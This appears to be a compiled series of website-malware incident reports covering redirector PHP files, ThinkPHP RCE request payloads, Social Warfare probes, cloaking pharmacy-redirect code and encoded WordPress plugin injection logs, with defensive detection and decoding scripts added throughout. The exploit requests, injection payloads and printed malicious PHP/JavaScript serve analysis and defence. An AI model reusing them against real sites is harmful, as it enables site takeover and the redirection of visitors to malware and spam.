Thousands of Redirecting Files

We recently cleaned a site where we found thousands of malicious files with the following content:

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://realprofit[.]su/" ) ;
?>

and

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://profitnow[.]su/" ) ;
?>

All of the files were located in the site root directory and had names derived from people's first names: mccarphy.php, viva.php, lotta.php, sang.php, trine.php, liviu.php, taylar.php, golden.php, staphane.php, stanislav.php, ismail.php, jerusha.php, menda.php, niel.php, samaira.php, kaa.php, franky.php, etc.
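Files of this shape are easy to find mechanically: they are tiny, contain nothing but header() calls, and all point at the same handful of destinations. The scanner below is an added example (not code from the original post) that walks a document root, flags every small .php file whose entire content is such a redirect block, and groups the hits by destination so the list of domains to block falls out directly. It also accepts a trailing exit;/die; after the headers, which is an assumption about a common variant; the post's samples have none. The sample files it writes into a temporary directory are constructed for the demonstration.

```python
"""Scanner for redirect-only PHP files (added example; not code from the post).

Walks a document root, reads every small .php file and reports those whose
entire content is a <?php ... ?> block of header() calls ending in a
Location: redirect, the shape of the mccarphy.php / viva.php files above.
A trailing exit;/die; is tolerated (assumed variant).  The sample files
written by demo() are constructed for this example."""
import os
import re
import tempfile

HEADER_CALL = r'header\s*\(\s*["\'][^"\']*["\']\s*\)\s*;'
EXIT_CALL = r'(?:exit|die)\s*(?:\(\s*\))?\s*;'
# Whole-file match: open tag, one or more header() calls, optional exit, optional close tag.
REDIRECT_ONLY = re.compile(
    r'\A\s*<\?php\s*(?:' + HEADER_CALL + r'\s*)+(?:' + EXIT_CALL + r'\s*)?(?:\?>)?\s*\Z',
    re.IGNORECASE)
LOCATION = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)["\']', re.IGNORECASE)


def classify(source: str):
    """Return the redirect target if `source` is a pure redirector, else None."""
    if not REDIRECT_ONLY.match(source):
        return None
    m = LOCATION.search(source)
    return m.group(1).strip() if m else None


def scan(root: str, max_size: int = 512):
    """Return sorted (path, target) pairs for redirect-only .php files under root.

    Files larger than max_size bytes are skipped: the redirectors are tiny,
    and legitimate code that merely contains a redirect is much bigger."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size:
                    continue
                with open(path, encoding='utf-8', errors='replace') as fh:
                    target = classify(fh.read())
            except OSError:
                continue
            if target:
                hits.append((path, target))
    return sorted(hits)


def group_by_target(hits):
    """Count redirectors per destination: the list you block and report."""
    counts = {}
    for _, target in hits:
        counts[target] = counts.get(target, 0) + 1
    return counts


# Constructed samples: the redirector mirrors the post's file, the other is benign.
SAMPLE_REDIRECT = ('<?php\n'
                   'header ( "HTTP/1.1 301 Moved Permanently" ) ;\n'
                   'header ( "Location: hxxp://realprofit[.]su/" ) ;\n'
                   '?>\n')
SAMPLE_LEGIT = '<?php\n// does real work, so it is not a pure redirector\necho "hello";\n'


def demo():
    """Write the samples into a temp dir, scan it, and return what was found."""
    with tempfile.TemporaryDirectory() as root:
        for name in ('mccarphy.php', 'viva.php'):
            with open(os.path.join(root, name), 'w') as fh:
                fh.write(SAMPLE_REDIRECT)
        with open(os.path.join(root, 'index.php'), 'w') as fh:
            fh.write(SAMPLE_LEGIT)
        hits = scan(root)
        return [(os.path.basename(p), t) for p, t in hits], group_by_target(hits)


if __name__ == '__main__':
    found, counts = demo()
    for name, target in found:
        print(f'{name} -> {target}')
    print(counts)
```

Run it against the real document root instead of the temp dir (`scan('/var/www/html')`) and review the grouped counts; a destination with hundreds of files behind it is the campaign, a single hit may be a legitimate stub and deserves a look before deletion.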

Most likely these files are used as part of an email malware campaign. We found an analysis of one malicious .doc file that made requests to several domains, including realprofit[.]su, then saved the response as an .exe file and executed it.

This wave of the campaign has infected many sites. Profitnow[.]su was created on November 28, 2018, and according to RiskIQ, 700+ sites redirected there. Realprofit[.]su was created on December 6, 2018, and 500+ sites redirected there.

Some other domains used in this malware campaign:

out36.selfsend.ru
to5.topwenches[.]com
trybestsale[.]su
onlinehotprice[.]su
saleallshop[.]su
bestshopmaster[.]su

ThinkPHP 5.x – Remote Code Execution Actively Exploited...

Earlier this year, we noticed an increase in attacks aiming at ThinkPHP. ThinkPHP is a PHP framework that is very popular in Asia. If you keep track of your site’s activity, the following log may look familiar:

POST: /index.php?s=captcha HTTP/1.1
Data: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig

In December 2018, a working exploit was released for the versions v5.0.23 and v5.1.31. The ThinkPHP team then released a new version that only partially fixed the problem. Here is a snippet of the patch:

$method = strtoupper($_POST[Config::get('var_method')]); 
- $this->{$this->method}($_POST); 
+ if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) { 
+ $this->method = $method; 
+ $this->{$this->method}($_POST); 
+ } 
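Review bot: whitelisting $method only narrows which Request method gets dispatched; the retained `$this->{$this->method}($_POST);` still hands the whole, attacker-controlled `$_POST` array to that method, so a `filter` key (or any other key the chosen method interprets) reaches the same filterValue()/call_user_func() path as before. The fix belongs at the sink: strip or validate reserved keys such as `filter` from user-supplied data before any Request method consumes it, rather than relying on the verb whitelist. A smaller point on the first line: `strtoupper($_POST[Config::get('var_method')])` emits a notice when the key is absent and a warning (a TypeError on PHP 8) when it is submitted as an array (`_method[]=`); read it with a default and reject non-strings before upper-casing.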

Remote Code Execution on ThinkPHP

The patch restricts the method parameter to legitimate HTTP verbs. The underlying problem is that, further along, the filterValue() function passes the filter parameter straight to PHP's call_user_func(), so any route that still reaches filterValue() with attacker-controlled filter values yields remote code execution (RCE). After reversing the patch, attackers found that filterValue() remained reachable with an even simpler payload:

data: a=system&b=id&_method=filter  (some important data and more payloads were skipped here)

Affected Versions of ThinkPHP

Versions 5.1.x/5.2.x are still affected, and since there is no strict validation of user input, bots have been updated with new payload variants to evade WAFs and the earlier fixes.
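Because the payloads vary and are often URL-encoded to slip past simple signatures, detection is better done on the decoded parameters than on the raw request line. The following is an added example (not code from the post or from the ThinkPHP project): it decodes the query string and POST body, strips PHP array suffixes (`filter[]` becomes `filter`), and flags the three ingredients the exploits above rely on: a `_method` override that is not an HTTP verb, client-supplied `filter`/`server` keys, and values naming a PHP execution function. The records in SAMPLES are constructed; only their payloads mirror the excerpts shown above.

```python
"""Detector for the ThinkPHP 5 request shapes discussed above (added example,
not code from the post or from the ThinkPHP project).  It URL-decodes the
query string and POST body, strips PHP array suffixes (filter[] -> filter),
and flags: a `_method` override that is not an HTTP verb, client-supplied
`filter` / `server` keys, and values that name a PHP execution function.
The records in SAMPLES are constructed."""
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LEGIT_METHODS = {"GET", "POST", "PUT", "DELETE", "PATCH"}   # what the patch whitelists
EXEC_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open",
              "assert", "eval", "call_user_func", "call_user_func_array"}


def params(qs: str):
    """Decode a query/body string into (key, value) pairs.

    Values are decoded a second time so a double-encoded payload sent to slip
    past a WAF is compared in its final form; array suffixes are dropped."""
    out = []
    for key, val in parse_qsl(qs, keep_blank_values=True):
        key, val = unquote_plus(key), unquote_plus(val)
        out.append((key.split("[", 1)[0].lower(), val))
    return out


def analyze(method: str, target: str, body: str = ""):
    """Return a list of (tag, detail) findings for one request."""
    findings = []
    for key, val in params(urlsplit(target).query) + params(body):
        if key == "_method" and val.upper() not in LEGIT_METHODS:
            findings.append(("method-override", f"_method={val}"))
        if key == "filter":
            findings.append(("filter-injection", f"filter={val}"))
        if key == "server":
            findings.append(("server-override", f"server[...]={val}"))
        if val.strip().lower() in EXEC_FUNCS:
            findings.append(("exec-function", f"{key}={val}"))
    return findings


def verdict(findings):
    """rce-attempt = an execution function plus a way to reach filterValue()."""
    if not findings:
        return "clean"
    tags = {tag for tag, _ in findings}
    if "exec-function" in tags and tags & {"method-override", "filter-injection", "server-override"}:
        return "rce-attempt"
    return "suspicious"


# Constructed records: (method, request target, POST body).
SAMPLES = [
    ("POST", "/index.php?s=captcha",
     "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname%20-a"),
    ("POST", "/index.php?s=captcha", "a=system&b=id&_method=filter"),          # post-patch variant
    ("POST", "/index.php?s=captcha",
     "_method=%5F%5Fconstruct&filter%5B%5D=passthru&method=get"),              # encoded to dodge naive rules
    ("GET", "/index.php?s=captcha", ""),                                        # plain captcha fetch
    ("POST", "/index.php?s=user/login", "username=alice&password=x&_method=PUT"),  # legitimate override
]


def triage(records=SAMPLES):
    """Map each record to its verdict."""
    return [verdict(analyze(*rec)) for rec in records]


if __name__ == "__main__":
    for rec, result in zip(SAMPLES, triage()):
        print(result, rec[0], rec[1], rec[2])
```

The legitimate `_method=PUT` override in the last record stays clean, which is the point of matching on decoded semantics rather than on the string `_method`: a rule that simply blocks the parameter would break form-based PUT/DELETE in any ThinkPHP application.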

Attackers are exploiting this vulnerability to upload cryptominers. The following are the most recent domains seen hosting the malicious binaries:

hxxp://love[.]thotiana[.]live/bins/x86[.]bot
hxxp://fid[.]hognoob[.]se/download[.]exe

Conclusion

As always, we recommend keeping your software up to date and using a WAF as a second layer of protection, since vendor patches are sometimes incomplete, as this one was.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Social Warfare Vulnerability Probes

After the recent disclosure of the Social Warfare plugin vulnerability, we've seen massive attacks that inject malicious JavaScript into the plugin's options.

The vulnerability was patched in version 3.5.3 of the plugin, so not every site running it is still vulnerable. To find the sites that actually are, attackers scan the Internet and probe them. Instead of pointing the plugin at a file whose code changes the settings, they point it at a file whose PHP code simply returns a predefined string, which a vulnerable site echoes back.

Here are some of the URLs of such probe files detected by our firewall:

hxxp://thehuglaw[.]com/cache/wq.txt
hxxp://www.fdqyj[.]com/lang/wp2.txt
hxxp://www.fdqyj[.]com/lang/wp3.txt
hxxp://kidsinthehouse[.]com/all-backup/libraries/share/fonts/tresz.txt
hxxp://kidsinthehouse[.]com/all-backup/libraries/share/fonts/551.txt
hxxps://gist.githubusercontent.com/kolzdnoy71/ef026d1b2587371fdc6b28a9a21249dd/raw/628d8b376d2122580d6fcbc63c41ea9778473b8f/gistfile1.txt
...

Each contains a trivial piece of PHP inside <pre> tags (the part of the fetched file that the vulnerable option loader evaluates). For example:

<pre>print(7457737+736723);</pre>

Or

<pre>system('echo dfdffg34dfg')</pre>

Some of these files are hosted on compromised third-party sites, and at this point some of them have already been removed.

Hacked sites are not the only hosting option the attackers use. We've seen them use Pastebin links (Pastebin removes them after abuse reports). Another option, visible in the list above, is GitHub, specifically its Gist service.

In the case of the Gist link above, the user who created it (kolzdnoy71) joined GitHub only on March 27, 2019.

Conditional redirection to an online pharmacy store

During an investigation, a client reported that every visitor who reached the site by clicking one of its results on Google.com was instantly redirected to an online pharmacy store.

The behaviour was tied to visits initiated by clicking any of the site's indexed search results on Google.com.

The malware sent all of those visitors to hxxps://pharm-bay(.)com.

After further investigation, we found that the attacker had hidden the malicious code in an extensionless file called “log” in the site's tmp folder.

wp-config.php had been modified to include() that file, so the code ran on every request.

Here is the conditional redirection snippet from the tmp/log file.

...if($content = $client->getContent()){
    if( (strpos($_SERVER['HTTP_USER_AGENT'], 'google') !== false ) || (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false ) ){
        echo $content;
        die;
    } elseif( (strpos($_SERVER['HTTP_REFERER'], 'google') !== false ) || (strpos($_SERVER['HTTP_REFERER'], 'bing') !== false ) ){
        if($_SERVER['REQUEST_URI'] != '/'){ ?><script src="hxxp://scipton(.)com/doorways/default/script/script4.js"></script><?php die; }
    }
}...

As you can see, the code first checks the User-Agent: anything containing 'google' or 'bot' is served the doorway content ($content) directly, so search engines index the pharmacy spam. For everyone else it checks the referrer: a visitor arriving from Google or Bing who requests any page other than the site root gets the malicious script, which redirects them to the hxxps://pharm-bay(.)com pharmacy store. A direct visit, or a visit to the front page, falls through to the normal site, which is what makes this kind of cloaking hard to spot from the owner's own browser.
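The practical consequence is that a plain `curl` of the page shows nothing; you have to request it the way a search visitor and a crawler would and compare. The harness below is an added example (not the post's code): detect_cloaking() fetches each URI under the header combinations the PHP branches on (crawler User-Agent, search-engine Referer, root versus deep page) and lists the variants whose body differs from a plain direct visit. simulated_fetch() re-implements the branching of the quoted snippet so the harness runs offline; http_fetch() is the real fetcher for a site you are authorised to test. The page bodies, script tag and URIs are constructed.

```python
"""Cloaking check for the conditional redirect above (added example; not the
post's code).  detect_cloaking() requests each URI under the header
combinations the PHP branches on and lists the variants whose body differs
from a plain direct visit.  simulated_fetch() mirrors the quoted PHP so the
harness runs offline; http_fetch() is the real fetcher.  Bodies, script tag
and URIs are constructed."""
from typing import Callable, Dict, Iterable

Fetch = Callable[[str, Dict[str, str]], str]   # (request URI, headers) -> body

BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

HEADER_VARIANTS = {
    "human-direct":      {"User-Agent": BROWSER_UA},
    "human-from-google": {"User-Agent": BROWSER_UA, "Referer": "https://www.google.com/"},
    "human-from-bing":   {"User-Agent": BROWSER_UA, "Referer": "https://www.bing.com/"},
    "googlebot":         {"User-Agent": GOOGLEBOT_UA},
}


def detect_cloaking(fetch: Fetch, uris: Iterable[str] = ("/", "/some-post/")):
    """For each URI, return the variants whose response differs from 'human-direct'."""
    report = {}
    for uri in uris:
        baseline = fetch(uri, HEADER_VARIANTS["human-direct"])
        report[uri] = sorted(label for label, headers in HEADER_VARIANTS.items()
                             if label != "human-direct" and fetch(uri, headers) != baseline)
    return report


# --- offline stand-in for the infected site -------------------------------
DOORWAY_PAGE = "<html>pharmacy doorway served to crawlers</html>"     # $content in the snippet
NORMAL_PAGE = "<html>the site's real page</html>"
REDIRECT_TAG = '<script src="hxxp://scipton(.)com/doorways/default/script/script4.js"></script>'


def simulated_fetch(uri: str, headers: Dict[str, str]) -> str:
    """Mirror the PHP: strpos() is case-sensitive, so the checks are plain substring tests."""
    ua = headers.get("User-Agent", "")
    referer = headers.get("Referer", "")
    if "google" in ua or "bot" in ua:            # crawlers get the doorway content
        return DOORWAY_PAGE
    if ("google" in referer or "bing" in referer) and uri != "/":
        return REDIRECT_TAG                      # search visitors on deep pages get the redirect script
    return NORMAL_PAGE                           # everyone else sees the real site


def http_fetch(base_url: str, timeout: float = 10.0) -> Fetch:
    """Real fetcher (not exercised here): GET base_url + uri with the given headers."""
    import urllib.request

    def fetch(uri: str, headers: Dict[str, str]) -> str:
        req = urllib.request.Request(base_url.rstrip("/") + uri, headers=headers)
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


if __name__ == "__main__":
    for uri, differing in detect_cloaking(simulated_fetch).items():
        print(uri, "->", differing or "consistent")
```

Against the real site you would call `detect_cloaking(http_fetch("https://example.invalid"))` with a couple of genuine post URLs; note that the front page comes back consistent for human visitors even on an infected site, so always include at least one deep URI, and treat any variant that differs as something to read, not just count, since legitimate sites do vary pages by User-Agent.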


Super Amazon Banners plugin gone rogue

During a recent investigation, we found the Super Amazon Banners plugin serving malware/spam via the domain seoranker[.]info. We suspect the domain expired and was re-registered by somebody else, who now uses it to serve the malware.

The plugin loads the following JavaScript, which tries to inject a popup (popupHtml) containing many spam links to external sites. It also appears to cause loading problems; some pages refuse to load at all:

(function() {'use strict'; if (window['shbNetLoaded']) return;window['shbNetLoaded'] = true;var popupHtml =

Here is a screenshot of the code the plugin is trying to load:

The issue was reported to WordPress and the plugin has been closed; it can no longer be downloaded. We recommend removing the plugin from your WordPress site if you are using it.

Multi-Vector Attack in Server Logs

We recently noticed an increase in suspicious requests in our logs which reveal a planned attack against the Social Warfare plugin. Bad actors added this brand-new exploit to an existing campaign, which already targeted other vulnerable plugins and themes, to inject malicious scripts.


Plugins and themes under attack

Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Decoded, the injected script redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php
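All of these requests, and the Social Warfare probes from the earlier section, share one structure: a form body or query string carrying the payload inside one option value, with the real destination hidden behind URL encoding and, for the script injections, behind String.fromCharCode(). The decoder below is an added example (not code from the post) that serves both sections: it parses a record, URL-decodes the body and query, maps the WordPress `action` (or the `swp_debug` parameter) to the component under attack, decodes the fromCharCode sequences and extracts every URL the attacker is trying to plant. The three records are constructed to mirror the shapes shown above; the IPs and domains in them are documentation placeholders, not the indicators listed in this post.

```python
"""Decoder for the admin-ajax / admin-post payloads above (added example; not
code from the post).  Parses a log record, URL-decodes body and query, maps
the WordPress `action` (or swp_debug) to the targeted component, decodes
String.fromCharCode(...) and extracts planted URLs.  The three records are
constructed; IPs and domains in them are placeholders."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

TARGETED = {
    "wpgdprc_process_action": "WordPress GDPR Compliance",
    "td_ajax_update_panel": "Newspaper theme",
    "savegooglecode": "Smart Google Code Inserter",
    "thim_update_theme_mods": "Education WP theme",
}
LINE_RE = re.compile(r'^(?P<ip>\S+) - (?P<body>.*?) \[(?P<date>[^\]]*)\] "(?P<method>\S+) (?P<path>\S+) HTTP')
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def decode_fromcharcode(js: str) -> str:
    """Replace each String.fromCharCode(n, n, ...) call with the string it builds."""
    return FROMCHARCODE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)


def parse_record(line: str):
    """Return ip/method/action/targeted/urls/js for one log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    body = {} if m["body"] == "-" else dict(parse_qsl(m["body"], keep_blank_values=True))
    query = dict(parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True))
    action = body.get("action")
    targeted = TARGETED.get(action)
    if "swp_debug" in query:   # Social Warfare: admin-post.php?swp_debug=load_options&swp_url=...
        targeted = "Social Warfare"
    decoded = decode_fromcharcode(" ".join(list(body.values()) + list(query.values())))
    return {
        "ip": m["ip"], "method": m["method"], "action": action, "targeted": targeted,
        "urls": sorted(set(URL_RE.findall(decoded))),
        "js": decoded,
    }


# --- constructed records (the third is built with urlencode so it is complete) ---
_JS = 'var a = "https://redirect.invalid/?t4"; window.location.href=a;'
_INJECTED = "<script language=javascript>eval(String.fromCharCode(%s));</script>" % ", ".join(
    str(ord(c)) for c in _JS)
RECORDS = [
    '198.51.100.7 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse'
    '%2C%22option%22%3A%22siteurl%22%2C%22value%22%3A%22https%3A%2F%2Fexample-cdn.invalid%2Fjava.js%3Ft%3D2%26%22%7D'
    '&security= [19/Mar/2019:10:00:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
    '198.51.100.8 - - [19/Mar/2019:10:00:01 +0000] '
    '"GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://203.0.113.22/mv.txt HTTP/1.1"',
    '198.51.100.9 - ' + urlencode({"action": "savegooglecode", "sgcgoogleanalytic": _INJECTED, "sgcwebtools": ""})
    + ' [19/Mar/2019:10:00:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
]


def summarize(lines=RECORDS):
    """(ip, targeted component, planted URLs) for every parseable record."""
    rows = []
    for line in lines:
        rec = parse_record(line)
        if rec:
            rows.append((rec["ip"], rec["targeted"], rec["urls"]))
    return rows


if __name__ == "__main__":
    for row in summarize():
        print(row)
```

Feed it real records (with the POST body logged, as in the excerpts above) and the output is a ready-made indicator list per source IP; the `js` field holds the decoded script, which is where you confirm that a fromCharCode blob is a redirect rather than, say, a benign analytics snippet.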

Malicious Domains and IPs:

IPs:

31.208.43.209
91.134.215.233
34.194.221.173
128.199.114.0
162.243.1.231
145.239.54.77
185.136.85.47
222.73.242.180
109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.js
hxxp://raiserate[.]com/mv.txt
hxxp://109.234.34.22/mv.txt
hxxps://verybeatifulpear[.]com
hxxps://blueeyeswebsite[.]com
hxxp://r-y-p[.]org/options.txt
hxxps://teutorrent[.]com/wp-includes/js/javascript-mini.js

From Fake Updates to Unwanted Redirects

At the end of February, we wrote about a massive wave of site infections that pushed fake browser updates.

In the beginning of March, the attack evolved into redirecting site visitors to sketchy ad URLs.


In WordPress, the injected script is typically found at the bottom of the active theme's footer.php. It still consists of an "eval(function(p,a,c,k,e,d)..." obfuscated script and Histats code with the same 4214393 ID (which is now found on 1564 sites).
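The "eval(function(p,a,c,k,e,d)" wrapper is a dictionary packer, not encryption: the string p is a template in which every word token is a base-a index into the word list k, and the eval'd function just substitutes the words back. Decoding it offline is therefore straightforward and is the first thing to do when triaging one of these footers, since the redirect target lives in the unpacked text. The unpacker below is an added example (not the post's code); PACKED is a constructed sample that mimics a referrer-conditional redirect and is not the script seen in this campaign.

```python
"""Unpacker for eval(function(p,a,c,k,e,d){...}) scripts (added example; not
the post's code).  p is a template whose \\w+ tokens are base-a indices into
the word list k; unpacking substitutes the words back, which is exactly what
the eval'd function does in the browser.  PACKED is a constructed sample."""
import re

PACKED_RE = re.compile(
    r"eval\(function\(p,a,c,k,e,d\).*?\}\s*\(\s*'(?P<p>(?:[^'\\]|\\.)*)'\s*,\s*(?P<a>\d+)\s*,\s*(?P<c>\d+)\s*,"
    r"\s*'(?P<k>(?:[^'\\]|\\.)*)'\s*\.split\('\|'\)\s*,\s*0\s*,\s*\{\}\s*\)\s*\)", re.DOTALL)
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def decode_index(token: str, base: int) -> int:
    """Inverse of the packer's e() encoder: digits 0-9a-z, then A-Z for base 62."""
    value = 0
    for ch in token:
        digit = ALPHABET.find(ch)
        if digit < 0 or digit >= base:
            raise ValueError(token)
        value = value * base + digit
    return value


def _unpack_match(m) -> str:
    """Rebuild the original script from one matched packed blob."""
    base = int(m["a"])
    words = m["k"].split("|")
    payload = re.sub(r"\\(['\\])", r"\1", m["p"])   # undo the JS single-quote string escapes

    def lookup(tok):
        try:
            i = decode_index(tok.group(0), base)
        except ValueError:              # not an index in this base: literal text, keep it
            return tok.group(0)
        # The packer leaves an empty slot (k[c]||c.toString(a)) when the word equals its index.
        return words[i] if i < len(words) and words[i] else tok.group(0)

    return re.sub(r"\b\w+\b", lookup, payload)


def unpack(js: str, max_rounds: int = 10) -> str:
    """Replace every packed blob in js with its unpacked script; repeats for nesting."""
    for _ in range(max_rounds):
        js, n = PACKED_RE.subn(_unpack_match, js)
        if n == 0:
            break
    return js


def is_packed(js: str) -> bool:
    return PACKED_RE.search(js) is not None


# Constructed sample: a base-16 packing of a referrer-conditional redirect.
PACKED = r'''eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 1="2://3.4/?5";6(7.8.9("a")!=-b){c.d.e=1}',16,15,'var|u|https|example|invalid|ad|if|document|referrer|indexOf|google|1|window|location|href'.split('|'),0,{}))'''
FOOTER = "</div>\n<script>" + PACKED + "</script>\n</body>"


if __name__ == "__main__":
    print(is_packed(FOOTER))
    print(unpack(FOOTER))
```

Running it on FOOTER yields the surrounding markup unchanged with the script replaced by `var u="https://example.invalid/?ad";if(document.referrer.indexOf("google")!=-1){window.location.href=u}`, which is the form you can actually read, grep for a domain in, and compare against the Histats snippet sitting next to it.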